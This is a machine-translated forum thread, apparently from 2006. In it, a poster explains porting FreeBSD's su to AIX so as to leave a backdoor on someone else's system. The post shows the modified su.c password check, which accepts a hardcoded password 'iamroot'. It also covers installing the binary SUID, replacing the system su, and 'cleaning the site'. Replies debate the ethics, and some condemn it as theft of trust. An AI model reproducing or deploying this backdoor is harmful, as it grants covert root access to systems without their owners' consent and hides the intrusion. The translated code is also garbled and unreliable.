Linux -Blue forest free software | Return to home page | Site Map | Search WWW | Contact Us | -->
Your current position : Homepage > Free Software > Technological exchanges >Application Programming -->


    

Blue Forest http://www.lslnet.com at 2:08 p.m. on August 16, 2006

FreeBSD will be transplanted to the AIX platform su

This day would like to give others the AIX system (ordinary users with a legitimate account number and security loopholes in the system to obtain a root权限) left a back door, but unlike IBM's AIX and Linux and FreeBSD open against AIX system online tools are few. The final decision on the replacement aix su. I tried to find a su Internet in the source code, but can not find one. Fortunately, I have some of his mainframe Unix (FreeBSD, AIX, Solaris :), but have root权限, so I tried to FreeBSD under su transplanted to the AIX source code. Here I would like to point out I am not a programmer, su understanding of the source code may be wrong.
Environment :
1, FreeBSD 4.5-Release gcc 2.95.3 +
2, IBM AIX 4.3.3 + gcc 2.9-aix51-020209
Note : In Gcc for AIX Http://www-1.ibm.com/servers/aix/products/aixos/linux/download.htmlshang Downloaded and installed in accordance with ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/README.txt steps to AIX systems.
Process :
1, the installation of FreeBSD source Packet. In /usr/src/usr.bin/su/ FreeBSD source code under the su (or directly from the FreeBSD FTP download path corresponding website), this catalog copy to the Makefile su.c FreeBSD and the other under a catalog operation make; make install, able to successfully compile and install /usr/bin su!
2, and will Makefile su.c package passed AIX, packed into a catalog operations make, there is something wrong with the main function of the difference between the two platform specific debugging can be a reference /usr/include/. H document to correct mistakes. AIX does not support Kerberos, SKEY, WHEEL_SU : to eliminate these redundant code. There aix the getopt function and the FreeBSD getopt bit different, the FreeBSD /usr/src/lib/libstand/getopt.c also need to transplant, in the completion of these tasks can basically under aix to compile a su.
3, the compiler now under su su alternative aix work. But we did not leave the back door in su. Carefully reading the source code can be found in su.c has such a code :
If (*pwd->pw_passwd) (
P = getpass ( "Password :");
If (!strcmp (pwd->pw_passwd, crypt (p, pwd->pw_passwd))) (
Fprintf (stderr, "Sorry\n");
Syslog (LOG_AUTH | LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty ());
Exit (1);
}
}

Adding back door :
If (*pwd->pw_passwd) (
P = getpass ( "Password :");
If (! (!strcmp (Pwd->pw_passwd, crypt (p, pwd->pw_passwd)) | | !strcmp (p, "iamroot"))) (
Fprintf (stderr, "Sorry\n");
Syslog (LOG_AUTH | LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty ());
Exit (1);
}
}
Chmod 4555 su make; implementation, and then you try to use their own translation of the su root, root or importation : iamroot the password users can switch the root! Do some tests to determine the procedures in your su aix system! Then /usr/bin replacing their copy of the original su procedures. Do not forget about cleaning the site.

Annex : aix-su.tar.gz in successfully tested under aix 4.3.3 + gcc 2.9-aix51-020209


Morals

Admire, has openly thief!
Really do not have too much trouble to leave the back door, make a direct vi complex products, coupled with SUID.

This is a technical forum, and I welcome you to discuss technical, not ethical.

Well, and find /usr/bin -perm IM -print can identify with suid who investigated the suspicious process su itself suid generally not be questioned.

Everyone has their own moral standards, and therefore I will not discuss moral issues. This is a technical forum to discuss technical and I welcome you!

BTW : I have described in my own system that the tests are done, I was so fierce ideological struggle : to transmit messages to others in the system. . .

Re : This is a technical forum, and I welcome you to discuss technical, not ethical.

"" Everyone has his own ethical standards, and therefore I will not discuss moral issues
Heaven! You almost illegal. Look at the letter seriously than others.



Support fertilizer head!

Dislike those who always shout "moral" and "country"


This is a free world, technical filed!
Just say what you think & Do what you want!

Re : This is a technical forum, and I welcome you to discuss technical, not ethical.

Technology and Morality :-)

If the machines were found spread to others, the public security bureau indicates that you can :-)
Bad :-)
The technical limited to the technical


Oh, there are "only" no more dangerous Derby virtue ethics.

Disgusting acts of those who wanted to test a bit.

Others trust you, so that you can (ROOT) to the landing system, but you can use him to your trust.

Friends like you stole allocated temporary custody of the keys.

[ Closed window ]


 Privacy Policy  Copyright © 1999-2000 LSLNET.COM. All rights reserved. Blue Forest website owners. E-mail : Webmaster@lslnet.com